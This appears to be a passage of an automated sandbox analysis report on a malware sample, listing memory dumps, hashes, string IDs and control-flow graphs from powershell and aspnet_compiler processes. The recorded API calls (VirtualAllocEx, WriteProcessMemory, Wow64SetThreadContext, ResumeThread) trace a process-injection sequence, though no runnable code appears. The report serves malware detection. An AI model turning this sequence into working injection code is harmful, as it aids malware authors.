                                                              • Instruction Fuzzy Hash: 82015E6250E3C09FD7128B258CA4B62BFA4DF52224F1980DBE9888F1A3C2695848C772
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1817483357.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_73d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$tPdq$tPdq$$dq$$dq$$dq
                                                              • API String ID: 0-3419624917
                                                              • Opcode ID: a88034655a3fb0d3ac6535bc55bf32bf67678b9a41da0869e86eb5e5ac4c5aff
                                                              • Instruction ID: c3d388c0f7db0102b6eff263687e7ff88205383842971e11e42e21871cafb23c
                                                              • Opcode Fuzzy Hash: a88034655a3fb0d3ac6535bc55bf32bf67678b9a41da0869e86eb5e5ac4c5aff
                                                              • Instruction Fuzzy Hash: 0FF10AF2B0021A8FEB108A68E81077ABBE6AFD5311F15847ED909CB251DB31DD46C7D1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1817483357.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_73d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$4'dq$4'dq$tPdq$tPdq
                                                              • API String ID: 0-2375391490
                                                              • Opcode ID: 03ec1fff5a1977cb1a738197277bf961805155b6b30520e57721e119c86ca88e
                                                              • Instruction ID: 9e8c040acf217aebc167fcf4c7259ed30436ab52352c634c80c4e19dc1f89326
                                                              • Opcode Fuzzy Hash: 03ec1fff5a1977cb1a738197277bf961805155b6b30520e57721e119c86ca88e
                                                              • Instruction Fuzzy Hash: E7F117F2704216DFEB148B68A81177ABBE6AFC6311F18847ED509CB281DB31DD46C792
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1817483357.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_73d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$4'dq$4'dq
                                                              • API String ID: 0-2296240322
                                                              • Opcode ID: 043091802183374e445ba4ef3f588e8fe6863f0c10c6e9ce2619f3af2617227a
                                                              • Instruction ID: cf349f5639bfb470404c50c31e2ba22afe720a6ae92bac4007bea1c7cfae1464
                                                              • Opcode Fuzzy Hash: 043091802183374e445ba4ef3f588e8fe6863f0c10c6e9ce2619f3af2617227a
                                                              • Instruction Fuzzy Hash: B59148F3B05249DFDB149B69E4106AABBF6EF89211F1484ABD44DCB281DB31CC41CB92
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1817483357.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_73d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $dq$$dq$$dq$$dq
                                                              • API String ID: 0-185584874
                                                              • Opcode ID: 3646592513f873938f62a98deba3f641678a9f641b8a748171ebe6f53120c5b8
                                                              • Instruction ID: 4e230d27aab7231d9aa2ac7288709cf6f9aac873e324eb541f49c2cc5bcc0885
                                                              • Opcode Fuzzy Hash: 3646592513f873938f62a98deba3f641678a9f641b8a748171ebe6f53120c5b8
                                                              • Instruction Fuzzy Hash: 27213AF2710206EBEB2495A9A840B37AA9B9BC1711F64843A950DCB3C1CF35CD418362
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1817483357.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_73d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$$dq$$dq
                                                              • API String ID: 0-4229963660
                                                              • Opcode ID: 0f18163347fb826f45aed22adda4eeec245b9988cf734fc65fb305e69f62bc38
                                                              • Instruction ID: 6cf17140a7ddaa2d27c922a62a180b85977272a6fc61dfcb37f080d43e67ec40
                                                              • Opcode Fuzzy Hash: 0f18163347fb826f45aed22adda4eeec245b9988cf734fc65fb305e69f62bc38
                                                              • Instruction Fuzzy Hash: 5A01F2A171E3815FD72A42682C2012A2FB66FC3A10B6A40EBD484DB2D7CB244D05C3A3

                                                              Execution Graph

                                                              Execution Coverage:6.9%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:70.1%
                                                              Total number of Nodes:67
                                                              Total number of Limit Nodes:7

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 04C38A6A
                                                              • VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 04C38B0C
                                                                • Part of subcall function 04C37314: WriteProcessMemory.KERNELBASE(?,00000000,00000000,18F42514,00000000,?,?,?,00000000,00000000,?,04C38B6F,?,00000000,?), ref: 04C393E4
                                                              • ResumeThread.KERNELBASE(?), ref: 04C38D8F
                                                              • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 04C390F4
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2033732709.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_4c30000_powershell.jbxd
                                                              Similarity
                                                              • API ID: AllocProcessVirtual$CreateMemoryResumeThreadWrite
                                                              • String ID:
                                                              • API String ID: 4270437565-0
                                                              • Opcode ID: e2bbc3d7e8cc5c0d3df90b63cdc4e1c3e22abd47de60f29ba526267e5d892815
                                                              • Instruction ID: 5879115cccba8aca63f0258be120db2c5474daf188dc4e4c8c45ac590bdc2868
                                                              • Opcode Fuzzy Hash: e2bbc3d7e8cc5c0d3df90b63cdc4e1c3e22abd47de60f29ba526267e5d892815
                                                              • Instruction Fuzzy Hash: 28429274E002198FDB24EF65C854B9EB7F3AF88301F1481A9E409A7291DB74AE85CF61
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2033732709.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_4c30000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4064e2bec924627200ef7bd3e8dc476323e13a8f3b5c8e85063c7942934ece85
                                                              • Instruction ID: 2e6a0abc692e098bde34fdc39363dc21cc71a08d4bc9f33a1bac27a511efac86
                                                              • Opcode Fuzzy Hash: 4064e2bec924627200ef7bd3e8dc476323e13a8f3b5c8e85063c7942934ece85
                                                              • Instruction Fuzzy Hash: F612C374A002198FEB24EB25CC44BA9B7F7AF85345F1481A9F508DB291DB30AE84CF61

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2069658988.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7b60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq
                                                              • API String ID: 0-3818565439
                                                              • Opcode ID: 456e3a24b5703c913458481181b2f991dec50d3e92228cca6ee521797aec14a9
                                                              • Instruction ID: e75486b324792317ea966aa1a576dc728ea50a4f9741feb66540766242b48c99
                                                              • Opcode Fuzzy Hash: 456e3a24b5703c913458481181b2f991dec50d3e92228cca6ee521797aec14a9
                                                              • Instruction Fuzzy Hash: 33C160F17143069FEB24AA7A8804B7BBBA5EF85311F24C4BADA05CB281DF35D941C761

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2069658988.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7b60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$4'dq$4'dq$$dq$$dq$$dq$$dq$$dq$$dq
                                                              • API String ID: 0-4287419856
                                                              • Opcode ID: 723b32f006b8eca7ebcc97fabc3bc9bc50f6c799ac637df5ea95ed090f6e2d61
                                                              • Instruction ID: 2643f972c4a80714b523759a509a70ae2d788c9812047e263e0f48d7d5c6a096
                                                              • Opcode Fuzzy Hash: 723b32f006b8eca7ebcc97fabc3bc9bc50f6c799ac637df5ea95ed090f6e2d61
                                                              • Instruction Fuzzy Hash: BDB13DF570430E9FEB158E6D840477BBBB6EF81211F2884EADA05CB291DB39C941CB61

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2069658988.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7b60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (odq$(odq$4'dq$4'dq$4'dq$4'dq
                                                              • API String ID: 0-3783337584
                                                              • Opcode ID: fad5c3b01905c857ec0d94a182c1a89c17ef78b8391666b6b6195832b3db9894
                                                              • Instruction ID: 850f02c975744898e9a0244a2a46ff3d9f91db96cf7c13b1f5fd15977239a46b
                                                              • Opcode Fuzzy Hash: fad5c3b01905c857ec0d94a182c1a89c17ef78b8391666b6b6195832b3db9894
                                                              • Instruction Fuzzy Hash: 09F1E5F1B0430ADFFB149F69C8087AABBA2FF85311F14C4AAD6198B291DB35C945C791

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2069658988.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7b60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$$dq$$dq
                                                              • API String ID: 0-328139867
                                                              • Opcode ID: 5bdf64f9a078b801365f319bad094f596232c2e4b00b721165e7542a310e41e6
                                                              • Instruction ID: 200d1e74702839f43dd50d992f7b791c4cd112ae66bdc3991a9737bbad8817bd
                                                              • Opcode Fuzzy Hash: 5bdf64f9a078b801365f319bad094f596232c2e4b00b721165e7542a310e41e6
                                                              • Instruction Fuzzy Hash: 7E312AF0604306DFEB20AE26C514F7A77A1EF51288F5980EAD6018B291EB39C940C771

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 898 4c372f0-4c39029 900 4c39031-4c39038 898->900 901 4c3902b-4c3902e 898->901 902 4c39043-4c39059 900->902 903 4c3903a-4c39040 900->903 901->900 904 4c39064-4c39107 CreateProcessW 902->904 905 4c3905b-4c39061 902->905 903->902 907 4c39110-4c39188 904->907 908 4c39109-4c3910f 904->908 905->904 915 4c3919a-4c391a1 907->915 916 4c3918a-4c39190 907->916 908->907 917 4c391a3-4c391b2 915->917 918 4c391b8 915->918 916->915 917->918 920 4c391b9 918->920 920->920
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 04C390F4
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2033732709.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_4c30000_powershell.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 53ec51e56cbf2a96c7a3c3f090272fccd04fcefe735bc6aab8b23aca3430e6c6
                                                              • Instruction ID: 30d7b73a5d9f142b1a9a2c2853af84fe81b25875e38e1c8f43e5b17590d4563e
                                                              • Opcode Fuzzy Hash: 53ec51e56cbf2a96c7a3c3f090272fccd04fcefe735bc6aab8b23aca3430e6c6
                                                              • Instruction Fuzzy Hash: 1A5129B1D0125ADFDB24CF99C944BDDBBB5BF48314F0085AAE909B7250D771AA84CF90

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 921 4c39360-4c393ae 923 4c393b0-4c393b6 921->923 924 4c393b8-4c393f1 WriteProcessMemory 921->924 923->924 925 4c393f3-4c393f9 924->925 926 4c393fa-4c3941b 924->926 925->926
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,00000000,00000000,18F42514,00000000,?,?,?,00000000,00000000,?,04C38B6F,?,00000000,?), ref: 04C393E4
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2033732709.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_4c30000_powershell.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 8ec5807519e35836d5a2090a49e073920e10ca2882b0c38532564e07d2751251
                                                              • Instruction ID: eca99f11c03dd2a49e7e8b8a0faff32aca595b5c605d717742552bfac13c864f
                                                              • Opcode Fuzzy Hash: 8ec5807519e35836d5a2090a49e073920e10ca2882b0c38532564e07d2751251
                                                              • Instruction Fuzzy Hash: D72139B18003499FDB10CF99D984BDEFBF4FB08320F44842AE518A7650D374A544CBA1

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 928 4c37314-4c393ae 930 4c393b0-4c393b6 928->930 931 4c393b8-4c393f1 WriteProcessMemory 928->931 930->931 932 4c393f3-4c393f9 931->932 933 4c393fa-4c3941b 931->933 932->933
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,00000000,00000000,18F42514,00000000,?,?,?,00000000,00000000,?,04C38B6F,?,00000000,?), ref: 04C393E4
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2033732709.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_4c30000_powershell.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 744188a4a87aec67ea7b10f98eaa0e54a26e619f224f5eec9e09c3bb396ded2d
                                                              • Instruction ID: 6b48396884351ebe27c130c4c3b41ab55cd1e9c5702955d82eaa3920e139a1be
                                                              • Opcode Fuzzy Hash: 744188a4a87aec67ea7b10f98eaa0e54a26e619f224f5eec9e09c3bb396ded2d
                                                              • Instruction Fuzzy Hash: 6A2107B19003099FDB50CF9AC884BDEBBF4FB48321F54842AE518A7250D378A944CBA5

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 949 4c391e9-4c39230 951 4c39232-4c3923a 949->951 952 4c3923c-4c39268 Wow64SetThreadContext 949->952 951->952 953 4c39271-4c39292 952->953 954 4c3926a-4c39270 952->954 954->953
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04C38923), ref: 04C3925B
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2033732709.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_4c30000_powershell.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 1eac73df7ca22006a791d2029383ad3c639af2f8181a07399a3e3f23d64d5a6f
                                                              • Instruction ID: 065a3f789dd8efb61e7bd23a1e26a1b765860ac7cbf8feb3d2069950d8c555d4
                                                              • Opcode Fuzzy Hash: 1eac73df7ca22006a791d2029383ad3c639af2f8181a07399a3e3f23d64d5a6f
                                                              • Instruction Fuzzy Hash: 6D1144B2C003499FDB10CFAAC844BDEFBF5AB88320F548029E458A3200D378A545CFA1

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 935 4c372fc-4c39230 937 4c39232-4c3923a 935->937 938 4c3923c-4c39268 Wow64SetThreadContext 935->938 937->938 939 4c39271-4c39292 938->939 940 4c3926a-4c39270 938->940 940->939
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04C38923), ref: 04C3925B
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2033732709.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_4c30000_powershell.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 5fe9b2e3d2cc6c4c144a444501e8952812f107aee66218879d05e6b64b652425
                                                              • Instruction ID: 210aab025e48a60ccf7efb1a242d442317e59e376ad5c07c04d8813a934f7f91
                                                              • Opcode Fuzzy Hash: 5fe9b2e3d2cc6c4c144a444501e8952812f107aee66218879d05e6b64b652425
                                                              • Instruction Fuzzy Hash: 081144B2D007498FDB10CF9AC844BAEFBF5EB88320F148129E418B3600D778A545CFA5

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 942 4c37320-4c39230 944 4c39232-4c3923a 942->944 945 4c3923c-4c39268 Wow64SetThreadContext 942->945 944->945 946 4c39271-4c39292 945->946 947 4c3926a-4c39270 945->947 947->946
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04C38923), ref: 04C3925B
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2033732709.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_4c30000_powershell.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 857e4fcd5d0d2cc8600a369d5b72f2cd7e946c711bb603f15364b589978aeb6d
                                                              • Instruction ID: 4279f2a7e8562df15b785222a115187f7ea4e4853693dc6939066cebac442cb8
                                                              • Opcode Fuzzy Hash: 857e4fcd5d0d2cc8600a369d5b72f2cd7e946c711bb603f15364b589978aeb6d
                                                              • Instruction Fuzzy Hash: D01114B6D006499FDB10CF9AC844BAEFBF5EB88320F158129E419B3701D778A545CFA5

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2069658988.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7b60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq
                                                              • API String ID: 0-1167855494
                                                              • Opcode ID: ea5e817c1e865ccb835a5c782135ce16e1f896c6cbe4d4c9e0440ae4e05124be
                                                              • Instruction ID: 55a4a22ebaf4e12d0660399810cff9c0c52738bf544db43f79fa3016ce9c253a
                                                              • Opcode Fuzzy Hash: ea5e817c1e865ccb835a5c782135ce16e1f896c6cbe4d4c9e0440ae4e05124be
                                                              • Instruction Fuzzy Hash: 9E21E6F0A0524ADFFB24AF29C5086B57BF1FF95251F0980EAD608CB291D739C984CB91
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2033451099.00000000033DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033DD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_33dd000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 299083d1ee6b513f852f477b6b1275a49bf7a488616700567efbf89400b1f83a
                                                              • Instruction ID: 5a846e45becf7a7c74c8ce60cbfa9ed6381a52a284add27f62ef97cc16382e9d
                                                              • Opcode Fuzzy Hash: 299083d1ee6b513f852f477b6b1275a49bf7a488616700567efbf89400b1f83a
                                                              • Instruction Fuzzy Hash: 7D01DF72408344AAE7209A29FCC4B66BF9CEF91325F0CC55AEC080A682C67C9841C6B1
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2033451099.00000000033DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033DD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_33dd000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 007d74bed26460b9a082cfc19aff745375e773fa2b35d0826ce652cedddf906d
                                                              • Instruction ID: 72b3deab3bb829f9dba1e0370b8a1e647de81ed199e3fb25ec9ccecd838dbe4d
                                                              • Opcode Fuzzy Hash: 007d74bed26460b9a082cfc19aff745375e773fa2b35d0826ce652cedddf906d
                                                              • Instruction Fuzzy Hash: 67015E6240E3C09EE7128B259C94B52BFA8DF53224F1DC1DBD8888F293C2699844C7B2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2033732709.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_4c30000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Xhq$$dq
                                                              • API String ID: 0-4001282582
                                                              • Opcode ID: f7e535352b7a40e619cb4701787d0423f3cc4bca33eb32754870c1224beaa4ef
                                                              • Instruction ID: 96b364a01f0a99281d954210af4e65afaa8b78056497cfd63846ef91f5838746
                                                              • Opcode Fuzzy Hash: f7e535352b7a40e619cb4701787d0423f3cc4bca33eb32754870c1224beaa4ef
                                                              • Instruction Fuzzy Hash: C1918F74B002189BDB08EB75985477E7BA7FBC8741F19C52AE406E7284DE39DC0397A1
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2033732709.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_4c30000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a08d0e4c0ab76e9ab19c1179b7261610bf4156780daaf6e274e3ed524a22c961
                                                              • Instruction ID: 8082d7703c73d6aeb89bda4138f8ead9935066d88facbe068fa691f23cc924cc
                                                              • Opcode Fuzzy Hash: a08d0e4c0ab76e9ab19c1179b7261610bf4156780daaf6e274e3ed524a22c961
                                                              • Instruction Fuzzy Hash: E041355685F3E22EDB036B3C68B00D67FB08E6365975E15C7C1D4CE0A3E508496ED3AA
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2033732709.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_4c30000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: af3feffbdc2f3629ed8a68dcd66f8b19f5515824c6164686b9910670a3df3400
                                                              • Instruction ID: 06f4e61d82cd9ed28c2560d621e65beca547654a06840a5475bba29f712b7f8c
                                                              • Opcode Fuzzy Hash: af3feffbdc2f3629ed8a68dcd66f8b19f5515824c6164686b9910670a3df3400
                                                              • Instruction Fuzzy Hash: 7C314E5285F3E22EDB436B3858B00D67FB08E63619B1A04C3C1D4CF0A3E508595ED7AB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2069658988.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7b60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$4'dq$4'dq$$dq$$dq$$dq
                                                              • API String ID: 0-716821188
                                                              • Opcode ID: 375a140aa2743fe6792718f5d97900b478291f03cb12a0d5aaec522b90939c24
                                                              • Instruction ID: b94d0567ab16a37a14bad63cd4c086b51603038742fb87721fbdadea2745f3d5
                                                              • Opcode Fuzzy Hash: 375a140aa2743fe6792718f5d97900b478291f03cb12a0d5aaec522b90939c24
                                                              • Instruction Fuzzy Hash: B081EAF1B042068FEB14AE6AD548B6AB7F6FF89211F1484FADA09CB241EB35C941C751
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2069658988.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7b60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$$dq$$dq
                                                              • API String ID: 0-4229963660
                                                              • Opcode ID: 7a3ca4d8a5ec0c67a066851a042158e21049ea01cd8efc35d425db562754a70f
                                                              • Instruction ID: d20115208408869a5700066c2fa566e43ddc1bcbc72e9182b6c6ff9e9eaf6700
                                                              • Opcode Fuzzy Hash: 7a3ca4d8a5ec0c67a066851a042158e21049ea01cd8efc35d425db562754a70f
                                                              • Instruction Fuzzy Hash: 660126E270A3854FDB2661692C3466A6F729BD271072940DBC541CB3C2CD184E45C7A3

                                                              Execution Graph

                                                              Execution Coverage:0.9%
                                                              Dynamic/Decrypted Code Coverage:5.6%
                                                              Signature Coverage:8.9%
                                                              Total number of Nodes:124
                                                              Total number of Limit Nodes:13

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 24 417063-41708c call 42ead3 27 417092-4170a0 call 42f0d3 24->27 28 41708e-417091 24->28 31 4170b0-4170c1 call 42d463 27->31 32 4170a2-4170ad call 42f373 27->32 37 4170c3-4170d7 LdrLoadDll 31->37 38 4170da-4170dd 31->38 32->31 37->38
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004170D5
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2068186230.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_400000_aspnet_compiler.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: d1d4f16ca705b75c08d2dd02030cb8e35a3b9e5fbcaa9c1acce442b9868752c5
                                                              • Instruction ID: d2bdfe92a6df6b11a72e1f8b55d3ed58340993e138cd653c837ef381cf487159
                                                              • Opcode Fuzzy Hash: d1d4f16ca705b75c08d2dd02030cb8e35a3b9e5fbcaa9c1acce442b9868752c5
                                                              • Instruction Fuzzy Hash: 000171B5E0020DBBDF10DBE1DC42FDEB778AB14308F0081AAE90897241F675EB488B95

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 49 42bda3-42bddc call 404593 call 42cf73 NtClose
                                                              APIs
                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042BDD7
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2068186230.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_400000_aspnet_compiler.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 665f723a5e82ca476e461ccdd2d259e5560fa7235934546a3ffd52d987c7a3c7
                                                              • Instruction ID: d90ea754d99db2d9abd4fcdc73495245e7fae96ad713b828660b781994584198
                                                              • Opcode Fuzzy Hash: 665f723a5e82ca476e461ccdd2d259e5560fa7235934546a3ffd52d987c7a3c7
                                                              • Instruction Fuzzy Hash: CDE04F712403147BC610AA5AEC41F9B776CDBC5714F004069FA0C67181C7B5BA1487F4

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 63 1a22b60-1a22b6c LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 6b8a97b17ced657a600dc228a5c9ead60d5afa0601190f09ddbeb10201cdd7b0
                                                              • Instruction ID: 27db5ababc355a92d83e824708e19b4265f1b49a1603201a947dbf5172090a6a
                                                              • Opcode Fuzzy Hash: 6b8a97b17ced657a600dc228a5c9ead60d5afa0601190f09ddbeb10201cdd7b0
                                                              • Instruction Fuzzy Hash: 0690026160240003410571584414716401A97E0201F56C121F1018590DC52989927225

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
